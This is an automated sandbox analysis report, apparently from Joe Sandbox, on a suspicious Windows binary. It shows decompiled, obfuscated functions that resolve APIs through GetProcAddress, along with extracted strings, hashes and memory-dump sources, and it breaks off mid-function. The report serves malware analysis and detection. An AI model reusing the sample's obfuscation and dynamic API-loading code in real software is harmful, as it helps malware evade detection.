                      • Opcode Fuzzy Hash: 246d1772fc066ace8d7c1e5dcbbcb5dd0bc2aae0014cf6080e8473ba49b9ba49
                      • Instruction Fuzzy Hash: 2C71BC75A542428FDB01DF74ECE86CD3BB1EB79314F08816B8948973A6E2780A48EB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00499A9D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 140libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00499BE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: &"7$G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$activeds.dll$networkitemfactory.dll$`}
                      • API String ID: 190572456-830328022
                      • Opcode ID: 1e62c7c84ccacd2e4ad41877efe2f6be189d08a479da8bef1fff470c8dff03be
                      • Instruction ID: bafc66baed9943f42ed8994ffddb644aafd16b49c3e2c2ad774c690539ea3986
                      • Opcode Fuzzy Hash: 1e62c7c84ccacd2e4ad41877efe2f6be189d08a479da8bef1fff470c8dff03be
                      • Instruction Fuzzy Hash: 19516975A043469FDB00DFB8EC982CE7FB1EB79310F08446AC4449736AE3390A48EB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004F9119 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 139COMMON
                      Download Yara Rule
                      APIs
                      • GetFileSize.KERNEL32(?,00000000), ref: 004F9234
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FileSize
                      • String ID: OSProvider.dll$System.Net.Primitives.dll$WinFax.dll$ah"$api-ms-win-core-namedpipe-l1-1-0.dll$sxproxy.dll
                      • API String ID: 3433856609-1704396371
                      • Opcode ID: fc41783bd8d6a6a2387f4c48dc523c112113f2af6adccb6682839a20e62a3a67
                      • Instruction ID: c9c98ba2c7c406c755d3a4b28666c09a7c742493c3ed8a7f67620173e64becb5
                      • Opcode Fuzzy Hash: fc41783bd8d6a6a2387f4c48dc523c112113f2af6adccb6682839a20e62a3a67
                      • Instruction Fuzzy Hash: 1251E076A543469FDB00DFB9EC986CD3BB1EB79310B08442AD844D3366E3340A49EB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0048EFC5 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 136libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 42%
                      			E0048EFC5(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				unsigned short _t33;
				unsigned short _t35;
				_Unknown_base(*)()* _t39;
				unsigned short _t41;
				unsigned short _t43;
				signed int _t44;
				unsigned short _t53;
				void* _t63;
				void* _t85;
				short _t87;
				void* _t89;
				signed int _t91;
				void* _t94;
				intOrPtr _t96;
				void* _t97;

				_t89 = __edx;
				_t33 =  *(_t97 - 8);
				 *(_t97 - 0x10) =  !( *(_t97 - 0x20));
				 *(_t97 - 8) = _t33;
				 *(_t97 - 0xc) = _t33;
				_t35 =  *(_t97 - 8);
				_push( *0x50944c);
				 *(_t97 - 8) = _t35;
				_push(_t35 >> 0x5ded);
				L00468BBD(_t35 >> 0x5ded, __edx);
				if("WSManHTTPConfig.exe" == 0x3aaf) {
				}
				 *0x50918a = 0x69fd;
				_t85 = 0x69fd + _t89;
				_t91 = _t89 + _t89 + 0x897d17;
				_t39 = GetProcAddress(??, ??);
				 *0x50bf11 =  *0x50bf11 - _t91;
				_t96 =  *0x50922c; // 0xd0b1
				 *0x50bf13 = _t39;
				_t63 = 0 - _t39;
				_t94 = 0xe14d;
				 *(_t97 - 8) = _t39;
				_t41 =  *(_t97 - 8);
				if(_t41 < 0x251f) {
					_t63 = 0x44a63f;
					 *0x509110 =  *0x509110 - 0x44a63f;
					_t85 = _t85 + _t85;
					if(_t85 != _t85) {
						 *0x5091aa = _t91;
					}
				}
				 *(_t97 - 8) = _t41;
				L0046744A(_t63, _t85, _t91, _t94, _t96, _t41, _t41);
				_t43 =  *(_t97 - 8);
				 *0x50bf0b =  *0x50bf0b + _t63 - 0x262a + 1;
				 *0x509c60 = _t43;
				 *0x50bf13 =  *0x50bf13 + _t43;
				 *(_t97 - 8) = _t43;
				if(_t43 != 0x18) {
					L12:
					_t44 = _t43 + 0xe9;
					goto L13;
				} else {
					_t44 =  *(_t97 - 0x10);
					if("WSManHTTPConfig.exe" != "WSManHTTPConfig.exe") {
						L13:
						 *0x50bf07 =  *0x50bf07 + _t44;
						 *0x50bf0a =  *0x50bf0a + 0x250a70;
						_push(0);
						_t87 = _t85 + _t85 + 1;
						 *0x509186 = _t87;
						 *0x50bf0a =  *0x50bf0a;
						if(0 >= 0x3b28) {
							 *((intOrPtr*)(_t97 - 0x24)) =  *((intOrPtr*)(_t97 - 0x24)) + _t87;
						}
						_push( *0x50912a);
						 *0x50907a =  *0x50907a + 0x1b9547;
						_t53 =  *(_t97 - 8);
						 *(_t97 - 8) = _t53;
						 *0x50904c =  *0x50904c - _t53;
						_push(0);
						_push( !0x4602d5);
						_push(E0048F1BA);
						_push(L00468197);
						return _t53 + _t53 + _t53 + _t53;
					}
					if(_t85 == _t85) {
						 *0x50bf0f =  *0x50bf0f + _t85;
						_t85 = _t85 + _t85;
					}
					if((_t91 & 0x0078f5ac) <= 0) {
						 *0x50a940 =  *0x50a940 + _t91;
						 *0x509202 = _t91;
					}
					_t43 =  *0x50bf13; // -9
					 *0x50bf14 = _t43;
					_t94 = 0;
					goto L12;
				}
			}


















                      0x0048efc5
                      0x0048efdc
                      0x0048efe1
                      0x0048efe4
                      0x0048efe7
                      0x0048eff9
                      0x0048effc
                      0x0048f002
                      0x0048f008
                      0x0048f009
                      0x0048f015
                      0x0048f015
                      0x0048f028
                      0x0048f02f
                      0x0048f034
                      0x0048f03a
                      0x0048f040
                      0x0048f049
                      0x0048f050
                      0x0048f056
                      0x0048f05a
                      0x0048f05f
                      0x0048f067
                      0x0048f06e
                      0x0048f077
                      0x0048f07c
                      0x0048f086
                      0x0048f08a
                      0x0048f08c
                      0x0048f08c
                      0x0048f08a
                      0x0048f093
                      0x0048f098
                      0x0048f09d
                      0x0048f0a6
                      0x0048f0ae
                      0x0048f0b3
                      0x0048f0b9
                      0x0048f0be
                      0x0048f10b
                      0x0048f10b
                      0x00000000
                      0x0048f0c0
                      0x0048f0c0
                      0x0048f0cf
                      0x0048f10e
                      0x0048f114
                      0x0048f129
                      0x0048f137
                      0x0048f13b
                      0x0048f13c
                      0x0048f14e
                      0x0048f159
                      0x0048f165
                      0x0048f165
                      0x0048f174
                      0x0048f186
                      0x0048f18d
                      0x0048f19d
                      0x0048f1a0
                      0x0048f1ac
                      0x0048f1ae
                      0x0048f1af
                      0x0048f1b4
                      0x0048f1b9
                      0x0048f1b9
                      0x0048f0d7
                      0x0048f0d9
                      0x0048f0df
                      0x0048f0df
                      0x0048f0eb
                      0x0048f0ed
                      0x0048f0f3
                      0x0048f0fa
                      0x0048f0fd
                      0x0048f103
                      0x0048f109
                      0x00000000
                      0x0048f109

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0048F03A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$HMETAFILEPICT_UserSize$NtPowerInformation$WSManHTTPConfig.exe$mscpxl32.dLL$p%
                      • API String ID: 190572456-4157850270
                      • Opcode ID: a0496b54c37e6094a7668117d8dba9d22dcb9ffaadc84a811336263c2251dc23
                      • Instruction ID: 4df4106768a3797d80051e91c1f8503140d658d6f946ed0a8ec638ae631480bb
                      • Opcode Fuzzy Hash: a0496b54c37e6094a7668117d8dba9d22dcb9ffaadc84a811336263c2251dc23
                      • Instruction Fuzzy Hash: BD518CB9B043469BDB00EFB8DCD86CD7BB0EB29320F44447AD940E3756E2380949DB09
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004A8F07 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 129COMMON
                      Download Yara Rule
                      C-Code - Quality: 50%
                      			E004A8F07(void* __ebx, void* __ecx, signed short __edx, void* __edi, short __esi, void* __eflags) {
				void* _t26;
				void* _t28;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;
				char _t38;
				intOrPtr _t68;
				intOrPtr _t83;
				short _t84;
				signed short _t92;
				short _t93;
				short _t100;
				void* _t104;

				_t100 = __esi;
				_t92 = __edx;
				E004A6C05(_t26, __edx, __edi, 1, 1);
				if((_t92 & 0x00009f77) < 0) {
					_t38 =  *0x50bf13; // -9
					 *0x50bf14 = _t38;
					 *0x50bf07 = _t38 + _t38 + 0x1e4;
				}
				_t93 = 0x88dc;
				 *0x50a860 =  *0x50a860 - 0x88dc;
				_t28 = GetCurrentProcess();
				if(0x888c != 0) {
					 *0x509228 = _t100;
				}
				 *(_t104 - 8) = _t28;
				 *0x50915e = 0x5ba4;
				_push( *((intOrPtr*)(_t104 - 0xc)));
				E004A7263( *(_t104 - 8), _t93);
				_t33 =  *(_t104 - 8);
				 *(_t104 - 8) = _t33;
				if(_t33 != 0x2f78) {
				}
				_t34 =  *(_t104 - 8);
				_t83 =  *0x509168; // 0x118d
				 *0x5091cc = _t93;
				 *(_t104 - 0x20) = _t34;
				 *(_t104 - 8) = _t34;
				_t35 =  *(_t104 - 8);
				_t84 = _t83 + 0x57d046;
				if(_t84 < _t84) {
					_t93 = 0x991a;
					 *0x509226 = _t100;
					 *0x50bf12 = _t35;
					 *0x50934c =  *0x50934c + _t100 - 0xc086 + 1;
					if(_t35 >= 0) {
						 *0x509518 =  *0x509518 + _t35;
					}
					_t68 =  *0x509904; // 0x0
					 *0x50bf0a =  *0x50bf0a - _t68;
					 *0x50bf0b =  *0x50bf0b + _t68;
					 *0x50915c = _t84;
				}
				 *(_t104 - 8) = _t104 - 0x24;
				 *0x509c9c =  *0x509c9c + 0x303256;
				 *0x509dc8 = 0x303256;
				_t37 =  *(_t104 - 8);
				if((_t93 + 0x00000001 & 0x0000945a) >= 0) {
					 *0x50bf17 =  *0x50bf17 - _t37;
					 *0x50bf17 =  *0x50bf17 + _t37;
					if(0 <= 0x6b4a7) {
					}
				}
				 *0x509132 =  *0x509132 + 0x1763bef;
				 *(_t104 - 0x3c) = _t37;
				 *(_t104 - 8) = _t37;
				_push(0x6262 >> 0x6262);
				_push(0x6262 >> 0x6262);
				_push(0x6262 >> 0x6262);
				_push(E004A90E8);
				_push(E00469BBC);
				return _t37;
			}

















                      0x004a8f07
                      0x004a8f07
                      0x004a8f0b
                      0x004a8f15
                      0x004a8f1a
                      0x004a8f20
                      0x004a8f2d
                      0x004a8f32
                      0x004a8f34
                      0x004a8f38
                      0x004a8f3e
                      0x004a8f49
                      0x004a8f4b
                      0x004a8f4b
                      0x004a8f52
                      0x004a8f66
                      0x004a8f79
                      0x004a8f7a
                      0x004a8f8f
                      0x004a8f9c
                      0x004a8fa3
                      0x004a8fa3
                      0x004a8fb1
                      0x004a8fb6
                      0x004a8fbd
                      0x004a8fc4
                      0x004a8fc7
                      0x004a8fd5
                      0x004a8fd8
                      0x004a8fe0
                      0x004a8fec
                      0x004a8ff0
                      0x004a8ff7
                      0x004a9003
                      0x004a900e
                      0x004a9018
                      0x004a901e
                      0x004a9020
                      0x004a9026
                      0x004a902c
                      0x004a9037
                      0x004a9037
                      0x004a904c
                      0x004a9054
                      0x004a905a
                      0x004a9067
                      0x004a9079
                      0x004a9092
                      0x004a9098
                      0x004a90a4
                      0x004a90a4
                      0x004a90b0
                      0x004a90ba
                      0x004a90c1
                      0x004a90c4
                      0x004a90da
                      0x004a90db
                      0x004a90dc
                      0x004a90dd
                      0x004a90e2
                      0x004a90e7

                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 004A8F3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CurrentProcess
                      • String ID: G.V$MapUserPhysicalPages$NtPowerInformation$System.Xml.XmlDocument.dll$V20$ucmhc.dll
                      • API String ID: 2050909247-3469501440
                      • Opcode ID: c0899a1504df3af32f325632db91db891ba291e2ada058e94a7a962e3b465fac
                      • Instruction ID: 7450580381a0ece5fd96fdb6882a5efdc4e73b25ec897176917bcee87dc13f87
                      • Opcode Fuzzy Hash: c0899a1504df3af32f325632db91db891ba291e2ada058e94a7a962e3b465fac
                      • Instruction Fuzzy Hash: 3A41DD75B543469FDB00EFB9ECD42CD7BB0FB3A310B08446A9889D7326E2340A089B59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0047B460 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 122libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0047B55F
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: $G>$>;$NtSetDriverEntryOrder$WFServicesReg.exe$WinFax.dll$activeds.dll
                      • API String ID: 190572456-2225798828
                      • Opcode ID: 4166fe98a3c85b4b0765844330d5b07e048e74812b4c07c0eea400dfc2818e2f
                      • Instruction ID: 7a45e3ef05fc088028042079ebf1cc44a6574be9e19278e8a1d78446082cce0c
                      • Opcode Fuzzy Hash: 4166fe98a3c85b4b0765844330d5b07e048e74812b4c07c0eea400dfc2818e2f
                      • Instruction Fuzzy Hash: 7A4181B4E1020A9FCB00DFB9D8D46DE7BB1EB29314F54803ADA4AE7316D3344984DB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00500560 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 105COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CommandLine
                      • String ID: IMCCPHR.exe$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$activeds.dll$api-ms-win-core-namedpipe-l1-1-0.dll$normaliz.dll$ucmhc.dll
                      • API String ID: 3253501508-771882437
                      • Opcode ID: 2eef136b8b55b95513f795949d84964e952052df19c832bb56a9d5a320ee3bc7
                      • Instruction ID: b7aeb221ccd88d159a0966d8203df523f85ceee8f324c3f8d295a77784a55c2f
                      • Opcode Fuzzy Hash: 2eef136b8b55b95513f795949d84964e952052df19c832bb56a9d5a320ee3bc7
                      • Instruction Fuzzy Hash: 5C415EB9F5030AAFCB01DFB9D8D47CD7BB1FB38310F1444699980AB785E2750A498B40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004BFA6A Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E004BFA6A(void* __ebx, short __ecx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t27;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t31;
				_Unknown_base(*)()* _t34;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				intOrPtr _t45;
				_Unknown_base(*)()* _t52;
				intOrPtr _t57;
				short _t72;
				intOrPtr _t75;
				intOrPtr _t77;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				void* _t103;
				void* _t105;

				_t72 = __ecx;
				E004A743B(__ebx, __ecx, __esi);
				_pop(_t22);
				 *(_t105 - 8) = _t22;
				_t45 =  *0x509870; // 0x21b400
				 *0x50bf10 =  *0x50bf10 + 0x1287d;
				E004B5012(_t45, __edi, __esi);
				_t26 =  *(_t105 - 8);
				_t97 = _t26;
				 *0x50926e =  *0x50926e - _t97;
				 *0x50bf17 =  *0x50bf17 + _t26;
				 *0x50906e =  *0x50906e + _t26;
				_t93 = (__edi + _t97 + 0x0000d743 | 0x000000eb) + 1;
				 *0x50bf14 = _t26;
				_t52 =  *0x50bf14; // 0x0
				 *(_t105 - 8) = _t26;
				 *0x5091e0 =  *0x5091e0;
				 *0x50bf11 =  *0x50bf11;
				_t99 = _t97;
				_t27 =  *(_t105 - 8);
				 *((intOrPtr*)(_t105 - 0x14)) = _t99;
				if(_t52 < 0) {
					if(_t93 >= 0) {
						 *0x509028 =  *0x509028 + _t27;
					}
					_t52 =  *0x509900; // 0x0
				}
				 *0x5090a6 =  *0x5090a6 + _t52;
				 *0x509c54 = _t52;
				 *0x50915c = _t72;
				_push( *((intOrPtr*)(_t105 - 0x14)));
				_push( *((intOrPtr*)(_t105 - 0x10)));
				_t57 =  *0x509cc8; // 0x0
				 *0x509f04 =  *0x509f04 + _t57;
				_t103 = _t99;
				_t28 = GetProcAddress(??, ??);
				 *0x50ab68 =  *0x50ab68;
				 *(_t105 - 8) = _t28;
				_t75 =  *0x5091aa; // 0x1
				 *0x50bf10 =  *0x50bf10 - _t75;
				_t30 =  *(_t105 - 8);
				 *0x5090c6 =  *0x5090c6 - 0x291cb5;
				_push(_t30);
				 *0x50bf09 =  *0x50bf09 + _t30;
				_push(0x52396a);
				E004AC2F5();
				_pop(_t31);
				_push(_t31);
				 *0x5091ce = 0x1d79e;
				if((E004B4838(_t31, 0x3c7b7d, 0x1d79e, _t93, _t103, 0x1d79e) & 0x000000b9) < 0) {
					 *0x50bf17 = 0xe1;
				}
				_pop(_t34);
				if(_t34 != 0) {
					 *0x50bf14 =  *0x50bf14 - _t34;
					_t35 = _t34;
					if(_t93 + _t93 <= 0) {
						 *0x50bf07 = _t35;
					}
					 *(_t105 - 0xc) = _t35;
					 *0x509c5c = 0xffffffffffffffd0;
					 *0x50915c = 0x590256;
					_t77 =  *0x50918c; // 0x1
					_t38 =  *(_t105 - 0xc);
					 *0x509810 =  *0x509810 - _t38;
					 *(_t105 - 8) = _t38;
					 *0x50bf10 =  *0x50bf10 + _t77;
					_t34 =  *(_t105 - 8);
					 *0x5097b4 = _t34;
					_push(_t34);
					_push(0);
					_push(_t103);
					_push(E004BFCA1);
					goto __esi;
				}
				return _t34;
			}























                      0x004bfa6a
                      0x004bfa6a
                      0x004bfa6f
                      0x004bfa74
                      0x004bfa84
                      0x004bfa8d
                      0x004bfa95
                      0x004bfaa4
                      0x004bfaa8
                      0x004bfab0
                      0x004bfac4
                      0x004bfadb
                      0x004bfae4
                      0x004bfae5
                      0x004bfaf8
                      0x004bfafe
                      0x004bfb01
                      0x004bfb08
                      0x004bfb10
                      0x004bfb11
                      0x004bfb14
                      0x004bfb19
                      0x004bfb1d
                      0x004bfb1f
                      0x004bfb1f
                      0x004bfb26
                      0x004bfb26
                      0x004bfb2c
                      0x004bfb33
                      0x004bfb3c
                      0x004bfb4a
                      0x004bfb59
                      0x004bfb5c
                      0x004bfb62
                      0x004bfb7b
                      0x004bfb7c
                      0x004bfb82
                      0x004bfb88
                      0x004bfb8b
                      0x004bfb9c
                      0x004bfba5
                      0x004bfbb4
                      0x004bfbbd
                      0x004bfbbe
                      0x004bfbc4
                      0x004bfbc5
                      0x004bfbcf
                      0x004bfbd3
                      0x004bfbd4
                      0x004bfbea
                      0x004bfbf6
                      0x004bfbfd
                      0x004bfc05
                      0x004bfc09
                      0x004bfc18
                      0x004bfc1e
                      0x004bfc25
                      0x004bfc27
                      0x004bfc27
                      0x004bfc2c
                      0x004bfc36
                      0x004bfc49
                      0x004bfc50
                      0x004bfc5d
                      0x004bfc60
                      0x004bfc66
                      0x004bfc69
                      0x004bfc6f
                      0x004bfc77
                      0x004bfc91
                      0x004bfc92
                      0x004bfc94
                      0x004bfc95
                      0x004bfc9f
                      0x004bfc9f
                      0x004c00f6

                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 004BFB7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: WFServicesReg.exe$api-ms-win-core-localization-l1-1-0.dll$sxproxy.dll$ucmhc.dll$}{<
                      • API String ID: 190572456-3469982134
                      • Opcode ID: 446bca627f78835192db30653a072d400cf5556b32ad5c1714e1fa2ea7183dc0
                      • Instruction ID: 6c02480fccaccdafaaa49699b66b8a4fdbceb72af2cd6b678bbead1452f72ce5
                      • Opcode Fuzzy Hash: 446bca627f78835192db30653a072d400cf5556b32ad5c1714e1fa2ea7183dc0
                      • Instruction Fuzzy Hash: 85517C75A483469FDB01DFB9ECD86CD7FB1EB79310B08486AD8449332AD3740949EBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00490E77 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 36%
                      			E00490E77() {
				signed int _t34;
				signed int _t36;
				signed int _t38;
				signed char _t42;
				_Unknown_base(*)()* _t43;
				signed int _t48;
				signed int _t50;
				void* _t57;
				unsigned short _t59;
				void* _t95;
				signed int _t96;
				void* _t98;
				intOrPtr _t99;
				short _t100;
				signed int _t104;
				signed int _t105;
				signed int _t107;
				intOrPtr _t109;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t115;

				_t34 =  *(_t115 - 8);
				_t59 = _t57 + 0x350437 >> _t96;
				 *(_t115 - 0x58) = _t34;
				_t98 = (_t96 & 0x00000075) + 0x7d;
				_t105 = _t104 | 0x0000008d;
				 *0x50a8ac =  *0x50a8ac + _t105;
				 *(_t115 - 8) = _t34;
				_t36 =  *(_t115 - 8);
				if(_t36 <= 0x2e) {
					_t95 = _t59 + _t59 - 0x46;
					 *0x5090fa =  *0x5090fa - _t95;
					_t59 = _t95 + _t98;
				}
				_t99 =  *0x509144; // 0x5f92
				_t100 = _t99 - 1;
				 *0x5091ac = _t105;
				_t107 = 0x9bd0;
				_push( *(_t115 - 0x58));
				_t112 = _t111 + 0xcc5343;
				 *(_t115 - 8) = _t36;
				_t38 =  *(_t115 - 8);
				 *(_t115 - 8) = _t38;
				if(_t38 >= 0x19) {
					_t100 = _t100 - 0x5fdf;
					 *0x50916a = _t100;
					 *0x509182 = _t100;
					if(0x8340 != 0) {
						_t107 = 0x9710;
						 *0x509206 = 0x9710;
						 *0x50921e = 0x9710;
					}
					 *0x509346 =  *0x509346 - _t113;
					_t112 = _t112 + _t112;
					_t38 = 0xf2;
					 *0x50bf17 =  *0x50bf17 - 0xf2;
				}
				 *((intOrPtr*)(_t115 - 0x10)) =  *((intOrPtr*)(_t115 - 0x10)) - 0x1e5a69;
				 *0x50bf0c =  *0x50bf0c + _t100;
				_t42 =  *(_t115 - 8);
				_push( *0x50944c);
				if(_t100 != _t100 || 0x71bb >= 0x71bb) {
					_t109 =  *0x5091d6; // 0x95a2
					_t107 = _t109 - 0x895c2a;
					 *0x509226 =  *0x509226 + _t107;
					if((_t42 & 0x000000bc) < 0) {
					}
				}
				 *0x50ba27 =  *0x50ba27 + _t112;
				_t43 = GetProcAddress(??, ??);
				if((_t107 & 0x00915e4b) <= 0) {
					 *0x50b232 =  *0x50b232 - _t113;
					_t112 = _t112 - 0xe128;
					 *0x509654 =  *0x509654 + _t112;
				}
				 *(_t115 - 8) = _t43;
				E0046624A( *(_t115 - 8), 0, 0x50a8c0, _t112, _t113,  *(_t115 - 8));
				_t48 =  *(_t115 - 8);
				 *0x509c28 = _t48;
				if(_t113 < 0) {
					 *0x50bac3 =  *0x50bac3 + _t112;
					 *0x50bf09 =  *0x50bf09 + _t48;
				}
				 *(_t115 - 8) = _t48;
				_t50 =  *(_t115 - 8);
				 *(_t115 - 8) = _t50;
				 *(_t115 - 0xc) =  !_t50;
				 *((intOrPtr*)(_t115 - 0x1c)) = 0x33fde7;
				 *0x50bf0a =  *0x50bf0a;
				 *0x5090a2 =  *0x5090a2 + 0x67fbce;
				_push(1);
				_push(0xcff79c);
				_push(E004910AA);
				goto __ebx;
			}

























                      0x00490e7d
                      0x00490e80
                      0x00490e85
                      0x00490e8b
                      0x00490e8e
                      0x00490e94
                      0x00490e9a
                      0x00490ea2
                      0x00490ea7
                      0x00490eab
                      0x00490eae
                      0x00490eb5
                      0x00490eb5
                      0x00490eb7
                      0x00490ebe
                      0x00490ebf
                      0x00490ecd
                      0x00490ed1
                      0x00490ed4
                      0x00490eda
                      0x00490ee2
                      0x00490ee7
                      0x00490eec
                      0x00490f01
                      0x00490f06
                      0x00490f0d
                      0x00490f19
                      0x00490f1b
                      0x00490f1f
                      0x00490f26
                      0x00490f30
                      0x00490f32
                      0x00490f3b
                      0x00490f3d
                      0x00490f3f
                      0x00490f3f
                      0x00490f52
                      0x00490f62
                      0x00490f6d
                      0x00490f70
                      0x00490f78
                      0x00490f84
                      0x00490f8b
                      0x00490f91
                      0x00490f9d
                      0x00490f9d
                      0x00490f9d
                      0x00490fa1
                      0x00490fad
                      0x00490fbc
                      0x00490fc1
                      0x00490fd1
                      0x00490fd6
                      0x00490fdd
                      0x00490fdf
                      0x00491011
                      0x00491016
                      0x00491023
                      0x0049102c
                      0x00491034
                      0x0049104d
                      0x00491056
                      0x00491059
                      0x00491061
                      0x0049106e
                      0x00491073
                      0x00491081
                      0x0049108c
                      0x00491092
                      0x0049109b
                      0x0049109d
                      0x0049109e
                      0x004910a8

                      APIs
                      Strings
                      • Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll, xrefs: 00491064
                      • j>0, xrefs: 0049101E
                      • G.V, xrefs: 0049108C
                      • NtSetDriverEntryOrder, xrefs: 00490FF7
                      • WSManHTTPConfig.exe, xrefs: 00490EF4
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtSetDriverEntryOrder$WSManHTTPConfig.exe$j>0
                      • API String ID: 190572456-2811260348
                      • Opcode ID: 16c1b107f712106d59b1db2d2d27c8b73c566b13f9b71947c3d3fa4959496397
                      • Instruction ID: 70318d716b1a3c22b8f9e77c1c564e80efa808e55bb97d55ae0295a338c20ebc
                      • Opcode Fuzzy Hash: 16c1b107f712106d59b1db2d2d27c8b73c566b13f9b71947c3d3fa4959496397
                      • Instruction Fuzzy Hash: 275188B6E107469FDB00DFA9E8D46CD7BB1EB39314B08807AD844E776AE3750A48DB14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004F97E5 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 32%
                      			E004F97E5(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _t15;
				void* _t18;
				int _t19;
				signed int _t22;
				signed int _t23;
				intOrPtr _t24;
				void* _t27;
				intOrPtr _t31;
				void* _t43;
				void* _t53;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t74;
				signed short _t76;
				void* _t82;
				void* _t83;
				void* _t86;
				void* _t88;

				_t86 = __esi;
				_t82 = __edi;
				_t64 = __ecx;
				if(__eax >= 0x14423c) {
					 *0x50bf0e =  *0x50bf0e + __ecx;
					_t64 = 0x7d16;
				}
				_t73 =  *0x5091fe; // 0x8d5f
				_t15 =  *(_t88 - 0xc);
				 *0x509860 = _t15;
				 *(_t88 - 8) = _t15;
				_t74 = _t73 - 0x95;
				_t43 = ( !("WSManHTTPConfig.exe") ^ _t64) + 0x1e;
				_t18 =  *(_t88 - 8);
				if(_t18 <= 7) {
					L5:
					 *0x50bf10 =  *0x50bf10 - _t64;
					_t74 =  *0x5091fe; // 0x8d5f
				} else {
